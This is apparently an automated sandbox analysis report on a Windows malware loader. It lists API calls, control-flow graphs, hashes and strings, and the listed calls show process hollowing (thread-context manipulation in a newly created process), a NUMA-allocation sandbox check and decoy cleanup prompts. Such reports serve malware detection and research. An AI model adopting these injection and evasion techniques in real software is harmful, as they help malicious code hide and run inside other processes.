                                                                                                                        • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                                                                                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405804
                                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                                                                                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:3.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:74.5%
                                                                                                                        Signature Coverage:13.8%
                                                                                                                        Total number of Nodes:145
                                                                                                                        Total number of Limit Nodes:11

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 228 4f08b7-4f0adc call 4f005f call 4f0838 call 4f0073 * 8 250 4f0ade 228->250 251 4f0ae3-4f0af3 228->251 252 4f0e52-4f0e55 250->252 254 4f0afa-4f0b1d CreateFileW 251->254 255 4f0af5 251->255 256 4f0b1f 254->256 257 4f0b24-4f0b4d VirtualAlloc ReadFile 254->257 255->252 256->252 258 4f0b4f 257->258 259 4f0b54-4f0b67 257->259 258->252 261 4f0b6d-4f0e37 259->261 262 4f0e3c-4f0e4b call 4f020a 259->262 265 4f0e4d-4f0e4f ExitProcess 262->265
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233825816-0
                                                                                                                        • Opcode ID: 9e58c89621ce49108897f7b77435126a2583bf69f22a21251ea728c797b76d89
                                                                                                                        • Instruction ID: e582769cc2ca96275a0f5243315e3139ceb59238ff983304d9c4a17d94b2d25d
                                                                                                                        • Opcode Fuzzy Hash: 9e58c89621ce49108897f7b77435126a2583bf69f22a21251ea728c797b76d89
                                                                                                                        • Instruction Fuzzy Hash: 57120720D5C3DCADDF11CBE998117FCBFB09F16601F1844CAE594EA292C27A478ADB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 303 4f07da-4f0820 call 4f005f call 4f0073 GetSystemInfo 309 4f0829 303->309 310 4f0822-4f0825 303->310 311 4f082b-4f082e 309->311 310->311
                                                                                                                        APIs
                                                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 004F07F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 31276548-0
                                                                                                                        • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction ID: e28f677c6270f52af9ae0c0dfb627f1c8e832ad2ef5b171f89d06d70bc0659fe
                                                                                                                        • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction Fuzzy Hash: E7F0A771E1410CAFDB08F6B898456BE77ACDB48340F10456EEB06E2242D938854142A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,0000173F,00003000,00000040,00000000,-02FAF080,00000000), ref: 004013CA
                                                                                                                        • EnumSystemCodePagesA.KERNEL32(?,00000000), ref: 004013EC
                                                                                                                        • _Func_class.LIBCPMTD ref: 00401417
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocCodeEnumFunc_classPagesSystemVirtual
                                                                                                                        • String ID: temporary files found. Do you want to delete them? [Y/N] $ wB$No temporary files found.$Temporary files deleted.
                                                                                                                        • API String ID: 731087948-139088005
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 57 4f0e56-4f0f26 call 4f005f call 4f0073 * 7 call 4f0109 CreateFileW 76 4f0f2c-4f0f37 57->76 77 4f1005 57->77 76->77 82 4f0f3d-4f0f4d VirtualAlloc 76->82 78 4f1007-4f100c 77->78 80 4f100e 78->80 81 4f1012-4f1017 78->81 80->81 86 4f1033-4f1036 81->86 82->77 83 4f0f53-4f0f62 ReadFile 82->83 83->77 85 4f0f68-4f0f87 VirtualAlloc 83->85 87 4f0f89-4f0f9c call 4f00da 85->87 88 4f1001-4f1003 85->88 89 4f1019-4f101d 86->89 90 4f1038-4f103d 86->90 99 4f0f9e-4f0fa9 87->99 100 4f0fd7-4f0fe7 call 4f0073 87->100 88->78 94 4f101f-4f1027 89->94 95 4f1029-4f102b 89->95 91 4f103f-4f1047 VirtualFree 90->91 92 4f104a-4f1052 90->92 91->92 94->86 97 4f102d-4f1030 95->97 98 4f1032 95->98 97->86 98->86 101 4f0fac-4f0fd5 call 4f00da 99->101 100->78 106 4f0fe9-4f0fee 100->106 101->100 107 4f0ff4-4f0fff VirtualFree 106->107 108 4f0ff0-4f0ff1 FindCloseChangeNotification 106->108 107->86 108->107
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,004F16EC,7FAB7E30), ref: 004F0F1C
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040), ref: 004F0F46
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000), ref: 004F0F5D
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040), ref: 004F0F7F
                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040,?,00000000,0000000E), ref: 004F0FF1
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040,?), ref: 004F0FFC
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040,?), ref: 004F1047
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 656311269-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 109 4f020a-4f0225 call 4f005f 112 4f0228-4f022c 109->112 113 4f022e-4f0242 112->113 114 4f0244-4f0251 112->114 113->112 115 4f0254-4f0258 114->115 116 4f025a-4f026e 115->116 117 4f0270-4f027d 115->117 116->115 118 4f0280-4f0284 117->118 119 4f029c-4f037a call 4f0073 * 8 118->119 120 4f0286-4f029a 118->120 137 4f037c-4f0386 119->137 138 4f0391 119->138 120->118 137->138 139 4f0388-4f038f 137->139 140 4f0395-4f03b1 138->140 139->140 142 4f03ba 140->142 143 4f03b3-4f03b5 140->143 145 4f03c1-4f03e9 CreateProcessW 142->145 144 4f0734-4f0737 143->144 146 4f03eb 145->146 147 4f03f0-4f0409 Wow64GetThreadContext 145->147 148 4f06e8-4f06ec 146->148 149 4f040b 147->149 150 4f0410-4f042d ReadProcessMemory 147->150 151 4f06ee-4f06f2 148->151 152 4f0731-4f0733 148->152 149->148 153 4f042f 150->153 154 4f0434-4f043d 150->154 155 4f0705-4f0709 151->155 156 4f06f4-4f06ff 151->156 152->144 153->148 157 4f043f-4f044e 154->157 158 4f0464-4f0483 call 4f129c 154->158 161 4f070b 155->161 162 4f0711-4f0715 155->162 156->155 157->158 159 4f0450-4f0456 call 4f1207 157->159 169 4f048a-4f04ab call 4f13b6 158->169 170 4f0485 158->170 168 4f045b-4f045d 159->168 161->162 166 4f071d-4f0721 162->166 167 4f0717 162->167 171 4f072d-4f072f 166->171 172 4f0723-4f0728 call 4f1207 166->172 167->166 168->158 173 4f045f 168->173 177 4f04ad-4f04b4 169->177 178 4f04f0-4f0510 call 4f13b6 169->178 170->148 171->144 172->171 173->148 180 4f04eb 177->180 181 4f04b6-4f04e2 call 4f13b6 177->181 184 4f0517-4f052c call 4f00da 178->184 185 4f0512 178->185 180->148 188 4f04e9 181->188 189 4f04e4 181->189 191 4f0535-4f053f 184->191 185->148 188->178 189->148 192 4f0571-4f0575 191->192 193 4f0541-4f056f call 4f00da 191->193 195 4f057b-4f0589 192->195 196 4f0655-4f0671 call 4f1055 192->196 193->191 195->196 197 4f058f-4f059d 195->197 204 4f0675-4f0696 Wow64SetThreadContext 196->204 
205 4f0673 196->205 197->196 200 4f05a3-4f05c3 197->200 203 4f05c6-4f05ca 200->203 203->196 206 4f05d0-4f05e5 203->206 207 4f069a-4f06a4 call 4f1156 204->207 208 4f0698 204->208 205->148 210 4f05f7-4f05fb 206->210 214 4f06a8-4f06ac 207->214 215 4f06a6 207->215 208->148 212 4f05fd-4f0609 210->212 213 4f0638-4f0650 210->213 216 4f060b-4f0634 212->216 217 4f0636 212->217 213->203 218 4f06ae 214->218 219 4f06b4-4f06b8 214->219 215->148 216->217 217->210 218->219 221 4f06ba 219->221 222 4f06c0-4f06c4 219->222 221->222 223 4f06cc-4f06d0 222->223 224 4f06c6 222->224 225 4f06dc-4f06e2 223->225 226 4f06d2-4f06d7 call 4f1207 223->226 224->223 225->145 225->148 226->225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 266 40e1f0-40e1f6 267 40e205-40e208 call 4122b3 266->267 269 40e20d-40e210 267->269 270 40e212-40e215 269->270 271 40e1f8-40e203 call 4151e0 269->271 271->267 274 40e216-40e240 call 40f8df call 40fa12 271->274
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040E208
                                                                                                                          • Part of subcall function 004122B3: __FF_MSGBANNER.LIBCMT ref: 004122CA
                                                                                                                          • Part of subcall function 004122B3: __NMSG_WRITE.LIBCMT ref: 004122D1
                                                                                                                          • Part of subcall function 004122B3: RtlAllocateHeap.NTDLL(00500000,00000000,00000001,00000000,00000000,00000000,?,00412111,?,?,?,00000000,?,0041085D,00000018,0042E4E8), ref: 004122F6
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040E226
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E23B
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3074076210-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%


                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004F07DA: GetSystemInfo.KERNELBASE(?), ref: 004F07F7
                                                                                                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 004F089D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocInfoNumaSystemVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 449148690-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 369 4f073a-4f0781 call 4f005f call 4f0073 * 2 VirtualAlloc 376 4f0788-4f0790 369->376 377 4f0783-4f0786 369->377 378 4f07d5-4f07d9 376->378 379 4f0792-4f079f 376->379 377->376 380 4f07a2-4f07a6 379->380 381 4f07be-4f07cf 380->381 382 4f07a8-4f07bc 380->382 381->378 382->380
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 004F0777
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _wcscmp.LIBCMT ref: 0042182D
                                                                                                                        • _wcscmp.LIBCMT ref: 0042183E
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00421ADC,?,00000000), ref: 0042185A
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00421ADC,?,00000000), ref: 00421884
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00416694,?,?,?,00000000), ref: 0041311A
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00413123
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: ebb97cce6e92702754f88398b24774fe136fed1aecae987d655b45f225664c3a
                                                                                                                        • Instruction ID: b7adb7d193c243b961f6339d3fcad427306452b133b830038cc2aa60d74570a9
                                                                                                                        • Opcode Fuzzy Hash: ebb97cce6e92702754f88398b24774fe136fed1aecae987d655b45f225664c3a
                                                                                                                        • Instruction Fuzzy Hash: 52B09231644209ABCB106B91EC09B483F28FB04652F818034FA0E44061EFA25412AA99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00414DA9,00000001,?,00420CF1,00420D8F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00414DEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 4b4936a009e48f79f676776f90f3432ed098d4c54e9df08cd65d9b4d83747f25
                                                                                                                        • Instruction ID: dc8dd27c791502aeb4cafd4e8be63cfba456a664f91fc5ef5c93dd8d2627ea6c
                                                                                                                        • Opcode Fuzzy Hash: 4b4936a009e48f79f676776f90f3432ed098d4c54e9df08cd65d9b4d83747f25
                                                                                                                        • Instruction Fuzzy Hash: 0EE0B676250208ABDF11AFA4FC46FA93BE5BB84B11F555421B9084A5A0C3B6B5A09B48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,0041A624,?,0041A624,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00414E21
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: a4c5e6812832621e5ea1910772ee014cd510767be264fb3d1d1197172fb578ac
                                                                                                                        • Instruction ID: ed81224b7b6a2bca46349e82032c7f04a825ce0310787a85c4bfcc61349feb8c
                                                                                                                        • Opcode Fuzzy Hash: a4c5e6812832621e5ea1910772ee014cd510767be264fb3d1d1197172fb578ac
                                                                                                                        • Instruction Fuzzy Hash: D0D01732000248BF8F01AFD0FC06CAA3BA9FB88324B040415F90845120C736A4709B28
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004130EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 97cdd1ee242ed5aeb214d00779ec855d0877c71e4ca47ade67693b9d5922d8d7
                                                                                                                        • Instruction ID: c15825806576fb3e759ae02071777ca406dee315423515d10ecee66220ed4e05
                                                                                                                        • Opcode Fuzzy Hash: 97cdd1ee242ed5aeb214d00779ec855d0877c71e4ca47ade67693b9d5922d8d7
                                                                                                                        • Instruction Fuzzy Hash: ADA0113000020CAB8A002B82EC088883F2CEA002A0B808030FA0C00022ABA2A822AA88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(0041067B,0042E4C8,00000014), ref: 004168A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: c2f420e7a6fcd30a75d8fce588d7697191e29a1ce90c6f75a285d5c02a85b7ad
                                                                                                                        • Instruction ID: 41de22d69d8f1a9191e3809705f0bf5e6bb174a1c37b0007c9f261bdccfa4f75
                                                                                                                        • Opcode Fuzzy Hash: c2f420e7a6fcd30a75d8fce588d7697191e29a1ce90c6f75a285d5c02a85b7ad
                                                                                                                        • Instruction Fuzzy Hash: 55B012F03071428787084F387C9920D36D46B08213351007D7007C1170DF20C450AA0C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction ID: 050eeb8071cc1429f69714460f97878f852eef65a43a5266e2420fe67a52adc2
                                                                                                                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction Fuzzy Hash: 7611A036600119AFC720EF69C8809BAB7E9EF947A47048016FD54CB312E739ED81C768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction ID: 746fb29b7c6769914f9bdda8f0933d3977a54e746f1859c428c3ae64fdc60ded
                                                                                                                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction Fuzzy Hash: 49E09A35264148EFCB00CBA8CE81D25B3F8EB08320B140291FA25C73A2EA38EE00DA54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction ID: 803d4eafe10d04380a11153d8f1901027966101e9ae7b468443b54c04b356c24
                                                                                                                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction Fuzzy Hash: D9E04F322106189BC7719B5ACA40DA7F7E8EBC87B0B594426EE8997612C236FC01C794
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
